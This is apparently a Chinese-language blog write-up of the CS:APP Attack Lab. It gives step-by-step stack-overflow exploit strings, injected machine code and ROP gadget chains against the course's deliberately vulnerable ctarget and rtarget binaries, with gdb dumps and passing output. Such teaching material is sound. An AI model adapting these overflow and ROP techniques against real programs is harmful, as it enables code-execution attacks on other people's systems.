ch_fu
ch_fu

CSAPP实验3:Attack Lab

一、资源概览

从网站上下载到压缩包target1,解压后包含如下文件:
- README.txt:文件夹中各个文件的介绍。
- ctarget和rtarget:用于进行攻击的可执行文件
- cookie.txt:一个八位十六进制数,有些攻击会用到。
- farm.c:ROP攻击中用到的“gadget farm”的源码。
- hex2raw:用于生成攻击字符串的工具程序。

二、注意事项

  1. 运行ctarget和rtarget时可以使用以下参数:
    • -q:self-study必选参数,避免程序寻找教师的服务器。
    • -h:列出可能的命令行参数
    • -i FILE:从文件读取输入,而非从标准输入

  2. 使用”./hex2raw”将exploit字符串转换为字节码。使用方法参考attack.pdf的Appendix A。简而言之,输入应该为每两个十六进制数一组,用空格进行分隔。比如十六进制0应该写作00,0xdeadbeef应该写作“ef be ad de”。hex2raw的使用方法如下:

    unix> cat exploit.txt | ./hex2raw | ./ctarget
  3. 本实验可以参考CS:APP3e之3.10.3节和3.10.4节。
  4. 使用ret指令实施攻击,所用的地址应该是下列之一:
    • 函数touch1, touch2或touch3的地址
    • 注入代码的地址
    • 从gadget farm中利用的gadgets地址
  5. 从rtarget文件中构造gadgets的时候,地址应该在start_farm和end_farm之间。

  6. 漏洞存在于getbuf函数:无法得知缓冲区是否能容纳读入的字符串。

    unsigned getbuf()
{
    char buf[BUFFER_SIZE];
    Gets(buf);
    return 1;
}

三、Part I: Code Injection Attacks

  • 攻击目标:ctarget
  • ctarget运行时,栈上位置是连续的,所以栈上的数据是可执行的。

Phase 1

  1. 任务:使ctarget从getbuf返回时,执行touch1的代码,而不是返回到test中继续执行。

  2. 建议:

    • 所需信息仅需要反汇编代码。可以用objdump -d
    • 注意字节顺序
    • 使用GDB,在getbuf的最后几步单步调试,确认情况
    • buf在栈帧中的位置取决于编译时的常量BUFFER_SIZE,以及GCC使用的分配策略。需要根据反汇编代码确定buf的位置。

  3. 查看getbuf

    gdb-peda$ disas getbuf
Dump of assembler code for function getbuf:
=> 0x00000000004017a8 <+0>:     sub    rsp,0x28
0x00000000004017ac <+4>:        mov    rdi,rsp
0x00000000004017af <+7>:        call   0x401a40 <Gets>
0x00000000004017b4 <+12>:       mov    eax,0x1
0x00000000004017b9 <+17>:       add    rsp,0x28
0x00000000004017bd <+21>:       ret    
End of assembler dump.

  4. 很容易发现buf的缓冲区大小为0x28,所以填充了40个双字之后,写入的地址就可以覆盖返回地址ret了。记得要把地址后面的0补足了。

    AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
c0 17 40 00 00 00 00 00
  5. Phase 1可以通过了。

    cd@ubuntu:~/pwn/csapp/attackLab$ cat exploit-1.txt | ./hex2raw | ./ctarget -q
    Cookie: 0x59b997fa
    Type string:Touch1!: You called touch1()
    Valid solution for level 1 with target ctarget
    PASS: Would have posted the following:
    user id bovik
    course 15213-f15
    lab attacklab
    result 1:PASS:0xffffffff:ctarget:1:AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA C0 17 40 00 00 00 00 00

Phase 2

  1. 任务:使ctarget从getbuf返回时,执行touch2的代码,而不是返回到test中继续执行。并且要将cookie作为参数传递给touch2。

  2. touch2的代码如下:

    void touch2(unsigned val)
{
    vlevel = 2;             /* Part of validation protocol */
    if (val == cookie) {
        printf("Touch2!: You called touch2(0x%.8x)\n", val);
        validate(2);
    } else {
        printf("Misfire: You called touch2(0x%.8x)\n", val);
        fail(2);
    }
    exit(0);
}

  3. 建议:

    • 传递给函数的第一个参数保存在%rdi中。
    • 注入代码应该把寄存器的值设成cookie,然后使用ret指令跳转到touch2。
    • 总是使用ret指令来执行程序的控制转移。

  4. 思考:

    • 注入代码的工作流程如上面的建议所示,首先要把%rdi的值设置为cookie的值,然后使用ret指令跳转到touch2。问题是,第二步怎么才能做到?
    • ret指令的作用:从栈上弹出地址A,然后把PC设置为A。通常书上讲的是call和ret如何配合使用。这里则可以单独利用ret的功能,把touch2的地址压入栈,使其位于栈顶,然后ret指令就会把控制转移到touch2。

  5. exploit-2

    注意!返回地址要用00前缀补齐位数;压入栈的地址要有**一个**00前缀,多余的00会被混入下一条指令,没有00的话下一条指令会被认作地址(gcc会处理好,不要自己乱加或者乱删)。

    48 c7 c7 fa 97 b9 59        /* mov    $0x59b997fa,%rdi */
68 ec 17 40 00              /* pushq  $0x4017ec        */
c3                          /* retq                    */
00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00     /* old %rsp                */
  6. Phase 2通过。

    cd@ubuntu:~/pwn/csapp/attackLab$ ./hex2raw < exploit-2.txt | ./ctarget -q
    Cookie: 0x59b997fa
    Type string:Touch2!: You called touch2(0x59b997fa)
    Valid solution for level 2 with target ctarget
    PASS: Would have posted the following:
    user id bovik
    course 15213-f15
    lab attacklab
    result 1:PASS:0xffffffff:ctarget:2:48 C7 C7 FA 97 B9 59 68 EC 17 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00

Phase 3

  1. 任务:Phase 3也需要把Cookie作为参数,传递给touch3。但是需要传递cookie的字符串形式。

  2. touch3的代码:

    /* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval)
{
    char cbuf[110];
    /* Make position of check string unpredictable */
    char *s = cbuf + random() % 100;
    sprintf(s, "%.8x", val);
    /* cookie is trasfered from unsigned to string */
    return strncmp(sval, s, 9) == 0;
}

void touch3(char *sval)
{
    vlevel = 3; /* Part of validation protocol */
    if (hexmatch(cookie, sval)) {
        printf("Touch3!: You called touch3(\"%s\")\n", sval);
        validate(3);
    } else {
        printf("Misfire: You called touch3(\"%s\")\n", sval);
        fail(3);
    }
    exit(0);
}
  3. 建议:
    • 需要把cookie转换为字符串表示形式。8位十六进制的cookie -> 8个十六进制表示的数字。(man ascii)
    • 注意,字符串要用字节0作为结尾!
    • 注入代码应该把%rdi设置为字符串的地址
    • 在调用hexmatch和strncmp的时候,将会把数据压入堆栈,所以会覆盖getbuf使用的缓冲区中的部分内存。所以,谨慎选择放置cookie的位置。

  4. 思考:

    要把cookie字符串作为参数,传递给touch3。那么需要在栈里找一个位置来保存cookie字符串。修改Phase 2的exploit,先把cookie放在0x5561dca8的位置。

    48 c7 c7 88 dc 61 55            /* mov    $0x5561dca8,%rdi */
68 fa 18 40 00                  /* pushq  $0x4018fa        */
c3                              /* retq                    */
00 00 00
35 39 62 39 39 37 66 61         /* $0x59b997fa, cookie     */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00         /* %rsp                    */

    在touch3的<+17>与<+28>处下断点,比较调用hexmatch前后,栈上内存的变化情况。

    gdb-peda$ disas touch3
Dump of assembler code for function touch3:
   0x00000000004018fa <+0>:     push   rbx
   0x00000000004018fb <+1>:     mov    rbx,rdi
   0x00000000004018fe <+4>:     mov    DWORD PTR [rip+0x202bd4],0x3        # 0x6044dc <vlevel>
   0x0000000000401908 <+14>:    mov    rsi,rdi
   0x000000000040190b <+17>:    mov    edi,DWORD PTR [rip+0x202bd3]        # 0x6044e4 <cookie>
   0x0000000000401911 <+23>:    call   0x40184c <hexmatch>
   0x0000000000401916 <+28>:    test   eax,eax
   0x0000000000401918 <+30>:    je     0x40193d <touch3+67>
   0x000000000040191a <+32>:    mov    rdx,rbx
   ......
End of assembler dump.

    <+17>处的栈上内存,其中0x5561dc78 ~ 0x5561dc9f为缓冲区,大小为40个字节。可以看到0x5561dca0的内存已经不是exploit写入的内容了,因为touch3有push rbx的操作。

    gdb-peda$ x /56b 0x5561dc78
0x5561dc78: 0x48    0xc7    0xc7    0x88    0xdc    0x61    0x55    0x68
0x5561dc80: 0xfa    0x18    0x40    0x00    0xc3    0x00    0x00    0x00
0x5561dc88: 0x35    0x39    0x62    0x39    0x39    0x37    0x66    0x61
0x5561dc90: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x5561dc98: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x5561dca0: 0x00    0x60    0x58    0x55    0x00    0x00    0x00    0x00
0x5561dca8: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

    <+28>处的栈上内存,其中0x5561dc78 ~ 0x5561dca0为缓冲区。此时原缓冲区的内容基本已经不同于exploit写入的内容。

    gdb-peda$ x /56b 0x5561dc78
0x5561dc78: 0x00    0xcc    0xb4    0x4a    0x28    0xa7    0xa4    0xb5
0x5561dc80: 0x88    0xdc    0x61    0x55    0x00    0x00    0x00    0x00
0x5561dc88: 0xe8    0x5f    0x68    0x55    0x00    0x00    0x00    0x00
0x5561dc90: 0x02    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x5561dc98: 0x16    0x19    0x40    0x00    0x00    0x00    0x00    0x00
0x5561dca0: 0x00    0x60    0x58    0x55    0x00    0x00    0x00    0x00
0x5561dca8: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

    分析一下,因为调用hexmatch,sprintf和strncmp多次压栈,而且写入cookie的栈上地址是随机的,因此传入的字符串不能保存在getbuf函数的缓冲区。可行的方式是把字符串保存在getbuf的父进程的栈中。如exploit-3所示。

  5. exploit-3

    48 c7 c7 a8 dc 61 55            /* mov    $0x5561dca8,%rdi */
68 fa 18 40 00                  /* pushq  $0x4018fa        */
c3                              /* retq                    */
00 00 00
FA 97 B9 59 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
78 dc 61 55 00 00 00 00         /* %rsp                */
35 39 62 39 39 37 66 61 00      /* cookie, at $0x5561dca8 */
  6. Phase 3成功通过。
    sh
    gdb-peda$ c
    Continuing.
    Type string:Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target ctarget
    PASS: Would have posted the following:
    user id bovik
    course 15213-f15
    lab attacklab
    result 1:PASS:0xffffffff:ctarget:3:48 C7 C7 A8 DC 61 55 68 FA 18 40 00 C3 00 00 00 FA 97 B9 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 DC 61 55 00 00 00 00 35 39 62 39 39 37 66 61 00

四、Part II: Return-Oriented Programming

简单来说,Part II和Phase 2以及Phase 3是相同的攻击目标,但是需要使用ROP攻击。每个gadget可以实现一个小步骤,完成对寄存器的操作,然后ret,接着执行下一个gadget。一系列被执行的gadgets形成了链条,最终达到我们的目的。

readme.pdf给出了Byte encodings of instructions,做题时按图索骥,在gadgets farm中寻找有没有匹配的gadget。

  • rtarget使用了两种技术防止代码注入攻击:

    1. 栈地址随机化
    2. 栈不可执行

  • 攻击方式:执行已有的代码,而不是注入新的代码。最常见的是ROP。

    1. ROP可以形成一个gadgets的链条,通过每个gadget末尾的ret指令,程序可以跳转到下一个gadget的开头。
    2. rtarget中的gadgets farm由start_farm和end_farm划定,请勿尝试从程序的其他部分构建gadgets。

  • 允许使用以下指令:

    • movq
    • popq
    • ret
    • nop
  • 建议:
    • 划定区域:从start_farm到mid_farm
    • 该攻击可以仅使用两个gadgets
    • 当一个gadget使用popq指令时,会从栈上pop数据。因此,exploit字符串应该包含gadget地址和data。

Phase 4

  1. 思考:
    首先要把cookie传入%rdi,然后再转入到touch2函数。

    根据readme.pdf的命令列表,在gadets farm中没有发现popq %rdi。于是可以先popq %rax,然后movq %rax, %rdi

  2. exploit-4
    这里的缓冲区完全被junk填充,然后从getbuf的ret向下执行。用到了两个gadget,所用到的data也放在了栈上。

    AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
cc 19 40 00 00 00 00 00     /* jump 0x4019cc; popq %rax         */
fa 97 b9 59 00 00 00 00     /* cookie                           */
c5 19 40 00 00 00 00 00     /* jump 0x4019c5; movq %rax, %rdi   */
ec 17 40 00 00 00 00 00     /* touch2                           */

  3. 通过Phase 4

    gdb-peda$ r -q < ./exploit-4-raw.txt 
Starting program: /mnt/hgfs/pwn/csapp/attackLab/rtarget -q < ./exploit-4-raw.txt
Cookie: 0x59b997fa
Type string:Touch2!: You called touch2(0x59b997fa)
Valid solution for level 2 with target rtarget
PASS: Would have posted the following:
    user id bovik
    course  15213-f15
    lab attacklab
    result  1:PASS:0xffffffff:rtarget:2:AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA CC 19 40 00 00 00 00 00 FA 97 B9 59 00 00 00 00 C5 19 40 00 00 00 00 00 EC 17 40 00 00 00 00 00

Phase 5

  1. 思考:

    同Phase 5一样,这里也需要考虑如何存放cookie字符串,并且多了一个传递字符串地址到%rdi的难题。

    首先,getbuf的缓冲区应该全部填充为junk,那么cookie字符串为了不干扰exploit的正常运行,必然要放在exploit的最后。

    第二个问题,一开始在gadgets farm找到许多如下的操作:

    mov    $0x909078fb,%eax
lea    -0x3c3876b8(%rdi),%eax
movl   $0xc7c78948,(%rdi)
......

    所以考虑过能否使用这些数值来拼凑一个地址,然后把cookie字符串放在那里。但是由于有栈随机化,所以这个思路不行。

    后来看了一些解答,发现居然有movq %rsp, %rax这样的神操作,那样就可以用(%rsp) + x的方式来得到cookie字符串的地址了。然后就是一通拼拼凑凑,用了8个gadgets完成了exploit。

  2. exploit-5
    关于这种需要很多gadgets才能完成的exploit,觉得思路肯定是最重要的,但是思路明晰之后,在组成gadgets的链条时,不妨用倒序查找的方法,也许会快一些。当然,今后肯定会使用一些查找gadgets的工具啦。

    AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
06 1a 40 00 00 00 00 00     /* jump 0x401a06               ;movq %rsp, %rax */
c5 19 40 00 00 00 00 00     /* jump 0x4019c5               ;movq %rax, %rdi */
ab 19 40 00 00 00 00 00     /* jump 0x4019ab               ;popq %rax       */
48 00 00 00 00 00 00 00     /* distance from here to cookie string          */
dd 19 40 00 00 00 00 00     /* jump 0x4019dd               ;movl %eax, %edx */
34 1a 40 00 00 00 00 00     /* jump 0x401a34               ;movl %edx, %ecx */
13 1a 40 00 00 00 00 00     /* jump 0x401a13               ;movl %ecx, %esi */
d6 19 40 00 00 00 00 00     /* jump 0x4019d6        ;lea (%rdi,%rsi,1),%rax */
c5 19 40 00 00 00 00 00     /* jump 0x4019c5               ;movq %rax, %rdi */
fa 18 40 00 00 00 00 00     /* touch3                                       */
35 39 62 39 39 37 66 61     /* cookie string                                */
00 00 00 00 00 00 00 00     /* string ends with 00                          */
  3. 通过Phase 5

    gdb-peda$
    Continuing.
    Type string:Touch3!: You called touch3("59b997fa")
    Valid solution for level 3 with target rtarget
    PASS: Would have posted the following:
    user id bovik
    course 15213-f15
    lab attacklab
    result 1:PASS:0xffffffff:rtarget:3:AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA 06 1A 40 00 00 00 00 00 C5 19 40 00 00 00 00 00 AB 19 40 00 00 00 00 00 48 00 00 00 00 00 00 00 DD 19 40 00 00 00 00 00 34 1A 40 00 00 00 00 00 13 1A 40 00 00 00 00 00 D6 19 40 00 00 00 00 00 C5 19 40 00 00 00 00 00 FA 18 40 00 00 00 00 00 35 39 62 39 39 37 66 61 00 00 00 00 00 00 00 00

五、参考资料

  1. CS:APP配套实验3:Attack Lab笔记
  2. 【不周山之读厚 CSAPP】III Attack Lab
  3. Beej的GDB快速指南

你可能感兴趣的:(CSAPP实验)

  • 2022-07-08 保利学府里李楚怡1307022
    ——保利碧桂园学府里——童梦奇趣【科学实验室】「7.9-7.10」✏玩出大智慧约99-144㎡二期全新升级力作
  • 为什么瘦子很难增胖? 我的狗毛毛
    我是个标准的瘦子,168,100斤。用一句通俗的话来讲,我连马甲线都瘦出来了(体脂含量比较低)。但是我反而很羡慕那些比较丰满的女人,我的理想是再增重十五斤,练成前凸后翘的魔鬼身材。为此我开始纠正自己不规律的作息,吃高热量的食物,减少运动量,能坐着绝不站着,能躺着绝不坐着。但是结果却没有丝毫变化。我一直很苦恼,直到最近在网上看到一个视频,英国的某个研究机构做了一个实验,想要知道瘦子能否在高热量的食物
  • 光盘文件系统 (iso9660) 格式解析 穷人小水滴 光盘文件系统iso9660denoGNU/Linuxjavascript
    越简单的系统,越可靠,越不容易出问题.光盘文件系统(iso9660)十分简单,只需不到200行代码,即可实现定位读取其中的文件.参考资料:https://wiki.osdev.org/ISO_9660相关文章:《光盘防水嘛?DVD+R刻录光盘泡水实验》https://blog.csdn.net/secext2022/article/details/140583910《光驱的内部结构及日常使用》ht
  • 6.0 践行打卡 D47 星月格格
    去努力改变1.运动步行13000+8分钟腿部拉伸2.阅读《墨菲定律》第三章第三节:霍桑效应~适度发泄,才能轻装上阵“霍桑效应”这一概念,源自于1924年一个1933年间以哈佛大学心理专家乔治·埃尔顿·梅奥教授为首进行的一系列工厂工人的谈话实验研究。“霍桑效应”告诉我们,在工作,生活中总会产生数不清的情绪反应,其中很大一部分是负面的负面情绪的积累会影响人的精神和心情,不仅仅会影响个人健康,还会破坏人
  • 好运来 是露漫漫呀
    4月9日下午17.45分晴此时学校里广播站放着激情热烈的歌曲——《好运来》。“好运来,祝你好运来……”第一瞬间,我想到了他们是放这首歌是为补考的同学招来好运气的。然后我思绪飞扬,飘到了高中考试前同学放这首歌来抚平心态。飘到了高考前整理班级课桌时,学校喇叭里大大咧咧放着《好运来》……疲惫的我会心一笑。飘到了上学期考细解实验试卷时的那个中午青春小胖放这首歌来招好运,祈祷考的都会…………关于《好运来》的
  • [实验室服务器使用]使用VSCode、PyCharm、MobaXterm和CMD连接远程服务器 YuanDaima2048 工具使用服务器vscodepycharmcmd代理模式机器学习实验
    文章总览:YuanDaiMa2048博客文章总览实验室服务器使用:使用VSCode、PyCharm、MobaXterm和CMD连接远程服务器在进行实验室工作时,远程连接服务器是常见的需求之一。本篇文章根据个人的一些使用介绍使用不同工具连接服务器的方法,并提供优化功能,使服务器能够使用本机代理的说明。准备服务器账号信息Host(主机):10.XXX.XX.XXXPort(端口):[SSHPort]U
  • 缓光
    心数实验显示,量子场不能单纯回应我们的愿望(情感要求),也不能单纯回应我们的目的(想法);只有当这两者同调时,或者说,当他们一致传播出相同的信号时,量子场才会有所回应。当我们结合高昂的情绪、开放的心,有意义的意念及明确的思维,我们将能发送出信息,使量子场以令人惊喜的方式回应我们。然而,量子场并非回应我们想要的,而是反应了我们是怎样的存在!摘自《未来预演》让心❤与脑一起演化出我们真正的存在吧!
  • 学习| 积极心理学—习得性无助 benignHu
    习得性无助——不知不觉,你居然习得了可怕的无助,从此,它将长久伴随着你,轻易不肯离去。“习得性无助”是积极心理学之父塞利格曼的研究成果,其概念由其提出。也正是因为“习得性无助”的发现,才有后来的积极心理学,所以今天我们来好好聊聊何谓习得性无助,如何走出习得性无助。01、习得性无助一、习得性无助的由来习得性无助源于经典心理学实验:美国著名心理学家、教育心理学的创始人爱德华·李·桑代克是一个科学心理学
  • 安全演练有保障,专项督查促改进——记公道中学校园安全(化学实验)系列活动 公中盛传云
    近期,公道中学为了全面贯彻落实“预防为主,安全第一,综合治理”的安全工作方针,学校按照安全工作方针的要求,通过多种途径开展了以“预防演练为主,人防物防技防相结合”的主题的安全教育系列活动。11月8日,在学校校务会议上,学校党总支书记李兆兵强调,学校必须采取有力措施,不断增强教师综治安全防范意识,落实学校安全工作责任制,切实保障教师和学生的安全坚决杜绝意外事故的发生,确保校园平安稳定、教育教学工作顺
  • 2022-07-06 榜一大哥啊
    非洲猪瘟检测流程要点1、进入实验室按照要求穿好装备进入实验室,病原稀释及制备,将实验用假阳性按照倍数稀释,最高稀释到一万倍。所有操作流程都在生物安全柜进行,按照流程进行编号,编写检测编号。在每个实验室都要将白大褂以及手套进行更换。2、到试剂准备区进行试剂准备,按照样品数量加阴阳对照进行配备,该项目在超净工作台进行。将制备好的试剂放入传递窗,进入核酸提取环节。3、核酸提取区,进行核酸提纯,用磁吸法核
  • 《对生命说是》读书笔记2021-5-27 Diana_58d9
    静心技巧——换个视角看待问题。尝试一下这个实验,1坐在椅子上,允许自己全身心的沉浸在你最爱的问题当中,你知道头脑热爱咀嚼他们,记录当你被卷入问题时的感受。2站起来有意识地离开那张椅子,想象你现在离开了你的问题。缓缓的围绕椅子走一圈,从不同的角度看看你的问题。在房间中找一个远离问题的空间,开始仔细深入的看看这个问题,他是真实的还是你制造出来的,同样的状况对于其他人来说会是问题吗?3反复体会作战问题里
  • 稍微落后的人更容易被激励成长 有杕之杜
    今日纯分享。图片发自App沃顿商学院市场营销学教授乔纳·伯杰在接受《哈佛商业评论》采访时,介绍了他的一项研究。伯杰教授告诉参加实验的人,他们在跟隔壁房间的另一个人比赛打字速度,获胜的人有金钱奖励。一轮比赛之后,伯杰给了这些人不同的反馈,有的人被告知远远落后竞争对手,有的人被告知稍稍落后,还有的人被告知不相上下或者略微领先。结果只有那些被告知“稍微落后”的人,在第二轮中速度明显提高,而且总体来说,这
  • 降伏不听话的静电,在家做一个富兰克林马达 三个爸爸实验室
    这是我们一起探索的第55个实验昨天我们一起认识了神奇的静电我们知道了通过摩擦可以产生静电我们也知道了有两种电荷一种是正电荷一种是负电荷如果两个正电荷相遇或者两个负电荷相遇他们会互相排斥如果是一个正电荷与一个负电荷相遇他们就会相互吸引今天我们就利用静电的这些特征做一个简易的马达由于美国科学家富兰克林对于静电研究非常多我们称这个马达为富兰克林马达一起来看一下怎么做的吧—富兰克林马达—三个爸爸实验室No
  • MATLAB语言基础教程、 小项目1:简单的计算器、 小项目2:有页面的计算器、使用App Designer创建GUI计算器 azuredragonz 学习教程matlab开发语言
    MATLABMATLAB语言基础教程1.MATLAB简介2.基本语法变量与赋值向量与矩阵矩阵运算数学函数控制流3.函数4.绘图案例:简单方程求解小项目1:简单的科学计算器功能代码项目说明小项目2:有页面的计算器使用AppDesigner创建GUI计算器主要步骤:完整代码(使用MATLAB编写)说明:如何运行:小项目总结MATLAB语言基础教程1.MATLAB简介MATLAB(矩阵实验室)是一种用于
  • 4×4矩阵键盘详解(STM32) 辰哥单片机设计 STM32传感器教学矩阵计算机外设stm32嵌入式硬件单片机传感器
    目录一、介绍二、传感器原理1.原理图2.工作原理介绍三、程序设计main.c文件button4_4.h文件button4_4.c文件四、实验效果五、资料获取项目分享一、介绍矩阵键盘,又称为行列式键盘,是用4条I/O线作为行线,4条I/O线作为列线组成的键盘。在行线和列线的每一个交叉点上设置一个按键,因此键盘中按键的个数是4×4个。这种行列式键盘结构能够有效地提高单片机系统中I/O口的利用率,节约单
  • 心理缺陷往往来自童年阴影——陪伴孩子更重要 进击的夏侯惇
    神罗婴儿语言实验800年前,神圣罗马帝国,腓特烈二世研究人类最初的语言是什么,因此他做了一个实验。他让50个刚刚出生的婴儿集中起来,让养母照顾婴儿的起居饮食,但是不让养母与婴儿有任何感情上的互动。除了喂食与洗澡以外,不能进行任何互动,不能亲不能抱,甚至不能看他们的眼睛。皇帝想要观察50名婴儿长大后会不会诞生人类最初的语言。会不会诞生出亚当与夏娃的语言?但是这些孩子在没有爱与关怀的环境中长大,他们究
  • 梦中的生日:三年级上学期 兰培宇 有香气的灵魂
    “我可以到李晓明爸妈工作的地方去找他们,你去一个实验室里面有进入梦境的机器,我们进去李晓明的梦中去帮助他。”班里主意多多的***正说着他的主意。“好主意。”同学们齐声说。王小明先去坐车去找他爸妈,唐三藏走了七七四十九天终于拿到了进去梦境的机器,他的爸妈见到了李晓明又孤独又伤心,李晓明的爸妈在蛋糕商店里买了一个又高又大的蛋糕,他们却没花钱,因为梦里什么都有,他们来到儿子的家里,他用双手蒙住儿子的眼镜
  • 基于matlab的离散系统变换域分析实验,实验3 离散时间系统的变换域分析 mmjang
    电子科技大学实验报告学生姓名:项阳学号:2010231060011指导教师:邓建一、实验项目名称:离散时间系统的变换域分析二、实验目的:线性时不变(LTI)离散时间系统的特性可以用其冲击响应序列来表示,也可以用传递函数和频率响应来表示,本实验通过使用MATLAB函数对离散时间系统的一些特性进行仿真分析,以加深对离散时间系统的零极点、稳定性,频率响应等概念的理解。三、实验内容:1、设X1(z)23z
  • 【山西定襄实验小学星空班一日叙事2022.1.8 张凯博】 Z飞雪
    平凡的一天作者:张凯博睡梦中听到有脚步声响,还没有睁眼的我,心里突然想起昨天老师给我布置的语文作业。睁开眼看到爸爸已经穿好衣服,估计是去锻炼身体,我转过脑袋,望着窗外黑乎乎的一片,觉得时间还早,“老爸,几点了?”我嘶哑的嗓子里努力地蹦出了一句。“噢——不到七点!”为了完成老师布置的任务,我下定决心咬了咬牙,把衣服穿上,天好冷,毕竟是三九的天了,不是有句俗语说“三九四九门缝叫狗……”吗?爸爸用好奇的
  • 51单片机:P3.3口输入/P 1口输出实验 li星野 单片机
    51单片机:P3.3口输入/P1口输出实验一、实验内容1P3.3口做输入口,外接一脉冲,每输入一个脉冲,P1口按十六进制除2(乘2)。2.P1口做输出口,P1口接的8个发光二极管L1—L8按十六进制除2(乘2)方式点亮。二、仿真图三、代码实现C语言实现:#include#includesbitKEY=P3^3;voiddelay10ms(void);voidmain(){charnum=0xfe;
  • oracle实验-RMAN的PIPE接口 congqingm32098 数据库
    RMAN的PIPE接口RMAN除了支持交互式和批处理式,还支持一种PIPE的接口,通过这种PIPE接口,可以在ORACLE中将各种命令发送给RMAN。首先,以PIPE方式启动RMAN,其中P1是管道的名称:F:>RMANPIPEP1TARGET/@TESTNOCATALOG恢复管理器:版本9.2.0.4.0-ProductionCopyright(c)1995,2002,OracleCorpora
  • 交换机级联 weixin_33701251
    一、级联简介级联是交换机组网的一种结构,级联技术可以实现两台或两台以上交换机之间的互联,在多种网络中被广泛应用二、简单实验实验拓扑:1-1,1-2,1-3三台交换机级联至1-3;2-1,2-2两台级联至2-2;1-3和2-2上联至HX,所有网段网关都在HX上。Server1A:10.3.1.1/2410.3.1.254vlan10Server1B:10.3.1.2/2410.3.1.254vlan
  • nginx部署前端项目的一些配置【刚入门】 weixin_30847271 运维前端ViewUI
    前期准备:在linux上安装nginx,我用的是腾讯云centos7服务器,具体的安装过程可以到腾讯云的开发者实验室里体验,自己先试试水。修改nginx.conf配置文件,我用到的修改只是以下的部分。1.端口号2.项目的存放位置server{listen8088default_server;#访问的端口号。listen[::]:8088default_server;server_name_;#ro
  • Python实验|磁盘垃圾文件清理器 cw11lq Pythonpython
    实验目的:1、熟练运用标准库os和os.path中的函数。2、理解sys库中argv成员用法。3、理解Python程序接收命令行参数的方式。4、理解递归遍历目录树的原理。5、了解从命令提示符环境运行Python程序的方式。实验内容:编写程序,实现磁盘垃圾文件清理功能。要求程序运行时,通过命令行参数指定要清理的文件夹,然后删除该文件夹及其子文件夹中所有扩展名为tmp、log、obj、txt以及大小为
  • 育方式吗?#科普 #涨知识 #人造子宫 努力幸运
    替代女性实现生养。为了证明人造子宫的可行性,美国费城儿童医院曾做过有趣的实验。科学家们将8只早产的小羊羔各自放进一个透明的塑料袋子里进行孕育。这些小羊羔的胎灵等同于22-23周的人类胎儿。塑料袋中清晰可见的粘稠液体又以模拟子宫内的羊水。袋子和小羊羔身体上还插着很多大大小小的管子,源源不断地输送着营养物质和氧气。科学家们将这样的袋子称为生育袋。生育袋放置在保温容器中,以维持妊娠所需的适宜温度。4个星
  • 整本书阅读评价设计 zhangshoulan
    一、评价设计的理论背景(一)2022新课标关于课程评价的描述:“语文课程评价包括过程性评价和终结性评价。过程性评价贯串语文学习全过程,终结性评价包括学业水平考试和过程性评价的综合结果。”“应关注整本书阅读和跨学科学习的阶段性评价,采用读书笔记、读书报告会、读书分享会等方式引导学生高质量完成整本书的阅读;可通过观察报告、实验报告、研究报告等,评价学生跨学科学习的阶段性成果。”“第一学段的评价要特别重
  • 让家教更有效的七大定律 海韵互联
    家庭是孩子的第一所学校,家长是孩子第一任老师。如何科学的进行家庭教育,你真的知道吗?今天我们一起来学习七大心理效应,运用科学的方法进行有效的家教。罗森塔尔效应罗斯塔尔做过一个著名的实验,他把小白鼠随机分成两组:A组和B组,并且告诉A组的饲养员说,这组老鼠非常聪明;同时又告诉B组的饲养员这一组的老鼠智力一般。几个月后,两组老鼠进行穿越迷宫测试,A组竟然真的比B组聪明,它们能够先走出迷宫找到食物。这一
  • 2019-03-16 Bqv丶它不想做功
    今日复盘1.早起5:28√2.口语晨读√3.演讲练习√4.健身√5.完成近现代史作业√6.办护照√7.交实验报告√今日收获今天感觉很充实,完成的事情很复杂却全都办到了,加油哦!今日反省某些事情处理的有点欠妥,下次注意!
  • 高通量测序的数据处理与分析指北(二)--宏基因组篇 lantary
    博客原文宏基因组篇前言之前的一篇文章已经从生物实验的角度讲述了高通量测序的原理,这篇文章旨在介绍宏基因组二代测序数据的处理方式及其原理。在正文开始之前,我们先来认识一下什么是宏基因组。以我的理解,宏基因组就是某环境中所有生物的基因组的合集,这个环境可以是下水道,河流等自然环境,也可以是人体内肠道,口腔等体环境。而宏基因组中的生物往往指的是微生物,如真菌,细菌,病毒,古细菌。我们这里主要以肠道微生物
  • 51单片机-AT24C02-实验2-秒表实验(可参考上一节) Whappy001 51单片机嵌入式硬件单片机
    利用定时器去对按键和数码管进行扫描(Whappy)main.c#include#include"LCD1602.h"#include"AT24C02.h"#include"Delay.h"#include"Timer0.h"#include"Nixie.h"#include"Key.h"unsignedcharKeyNum;unsignedcharMin,Sec,MiniSec;unsignedc
  • windows下源码安装golang 616050468 golang安装golang环境windows
